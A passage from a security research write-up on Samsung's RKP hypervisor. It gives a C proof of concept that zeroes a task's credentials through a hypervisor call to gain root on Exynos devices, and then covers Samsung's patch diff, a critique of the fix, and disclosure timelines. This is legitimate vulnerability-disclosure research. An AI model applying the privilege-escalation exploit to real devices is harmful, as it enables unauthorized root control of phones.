    res = dynamic_load_rm(rkp_dyn);
    // ...
  } else {
    res = 0;
  }
  ret_va = regs->x4;
  if (ret_va) {
    *virt_to_phys_el1(ret_va) = res;
  }
  regs->x0 = res;
  return res;
}

In our exploit, we have used rkp_cmd_dynamic_load because when an invalid subcommand is specified, the return code and thus the value that is written to the target address is 0. This is very useful, for example, to change a UID/GID to 0 (root).

Proof of Concept

#define UH_APP_RKP 0xC300C002

#define RKP_DYNAMIC_LOAD 0x20

void print_ids() {
    uid_t ruid, euid, suid;
    getresuid(&ruid, &eudi, &suid);
    printf("Uid: %d %d %d\n", ruid, euid, suid);

    gid_t rgid, egid, sgid;
    getresgid(&rgid, &egid, &sgid);
    printf("Gid: %d %d %d\n", rgid, egid, sgid);
}

void write_zero(uint64_t rkp_dyn_p, uint64_t ret_p) {
    kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, 42, rkp_dyn_p, ret_p);
}

void exploit() {
    /* print the old credentials */
    print_ids();

    /* get the struct cred of the current task */
    uint64_t current = kernel_get_current();
    uint64_t cred = kernel_read(current + 0x7B0);

    /* allocate the argument structure */
    uint64_t rkp_dyn_p = kernel_alloc(0x38);
    /* zero the fields of the struct cred */
    for (int i = 4; i < 0x24; i += 4)
        write_zero(rkp_dyn_p, cred + i);

    /* print the new credentials */
    print_ids();
}
Uid: 2000 2000 2000
Gid: 2000 2000 2000
Uid: 0 0 0
Gid: 0 0 0

By running the proof of concept, we can see that the current task's credentials changed from 2000 (shell) to 0 (root).

The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1. The bug was only present in the binaries of Exynos devices (because the "dynamic load" feature is not available for Snapdragon devices), including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.

Patch

Here is the immediate remediation step that we suggested to Samsung:

- Add a flag to virt_to_phys_el1 to specify if it should check if the memory
needs to be readable or writable from the kernel, or split this function in two

After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3.

Changes were made to the rkp_cmd_rkp_robuffer_alloc function. It now ensures the kernel-provided address is marked as FREE in the physmap before writing to it and triggers a policy violation if it isn't.

int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t *regs) {
  // ...
  page = page_allocator_alloc_page();
  ret_va = regs->x2;
  // ...
  if (ret_va) {
    // ...
-    *virt_to_phys_el1(ret_va) = page;
+    ret_pa = virt_to_phys_el1(ret_va);
+    rkp_phys_map_lock(ret_pa);
+    if (!is_phys_map_free(ret_pa)) {
+      rkp_phys_map_unlock(ret_pa);
+      rkp_policy_violation("RKP_07fb818a");
+    }
+    *ret_pa = page;
+    rkp_phys_map_unlock(ret_pa);
  }
  regs->x0 = page;
  return 0;
}

Similar changes were made to the rkp_cmd_dynamic_load function.

int64_t rkp_cmd_dynamic_load(saved_regs_t *regs) {
  // ...
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    // ...
  } else {
    res = 0;
  }
  ret_va = regs->x4;
-  if (ret_va)
-    *virt_to_phys_el1(ret_va) = res;
+  if (ret_va) {
+    ret_pa = rkp_get_pa(ret_va);
+    rkp_phys_map_lock(ret_pa);
+    if (!is_phys_map_free(ret_pa)) {
+      rkp_phys_map_unlock(ret_pa);
+      rkp_policy_violation("RKP_07fb818a");
+    }
+    rkp_phys_map_unlock(ret_pa);
+    *ret_pa = res;
+  }
  regs->x0 = res;
  return res;
}

The patch works right now because there are no other command handlers accessible after initialization that use virt_to_phys_el1 before writing to the address, but it only fixes the exploitation paths and not the root cause. It is possible that in the future, when a new command handler is added, the physmap check is forgotten and the vulnerability is thus reintroduced. Furthermore, the patch also assumes that memory that is read-only from the kernel will never be marked as FREE. While this holds true for now, it might change in the future as well.

A better solution would have been to add a flag denoting to check for read or write access as an argument to the virt_to_phys_el1 function.

Conclusion

In this conclusion, we would like to give you our thoughts about Samsung RKP and its implementation as of early 2021.

With regards to the implementation, the codebase has been around for a few years already, and it shows. Complexity increased as new features were added, and bug patches had to be made here and there. This might explain how mistakes like the ones revealed today could have been made and why configuration issues happen so frequently. It is very likely that there are other bugs lurking in the code that we have glossed over. In addition, we feel that Samsung has made some strange choices, both in the design process and in their bug patches. For example, duplicating information that is already in the stage 2 page tables (for example, the S2AP bit and the ro_bitmap) is very error-prone. They also seem to be patching specific exploitation paths instead of the root cause of vulnerabilities, which is kind of a red flag.

Leaving these flaws aside for a moment and considering the overall impact of Samsung RKP on device security, we believe that it does contribute a little bit to making the device more secure as a defense-in-depth measure. It makes it harder for an attacker to achieve code execution in the kernel. However, it is certainly not a panacea. When writing an Android kernel exploit, an attacker will need to find an RKP bypass (which is different from a vulnerability in RKP) to compromise the system. Unfortunately, there are known bypasses that still need to be addressed by Samsung.

Timeline

SVE-2021-20178

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 25, 2021 - No updates at the moment.
  • Feb. 17, 2021 - Vulnerability is confirmed.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - The issue will be patched in the May security update.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 08, 2021 - Notification that the update patching the vulnerability has been released.
  • Jul. 20, 2021 - We reopen the issue after binary diffing the fix.
  • Jul. 30, 2021 - The issue will be patched in the October security update.
  • Oct. 05, 2021 - Notification that the update patching the vulnerability has been released.

SVE-2021-20179

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 25, 2021 - No updates at the moment.
  • Feb. 17, 2021 - Vulnerability is confirmed.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - The issue will be patched in the May security update.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 06, 2021 - Notification that the update patching the vulnerability has been released.

SVE-2021-20176

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 29, 2021 - No updates at the moment.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - Vulnerability is confirmed.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 06, 2021 - We ask for updates.
  • Jun. 23, 2021 - Notification that the update patching the vulnerability has been released.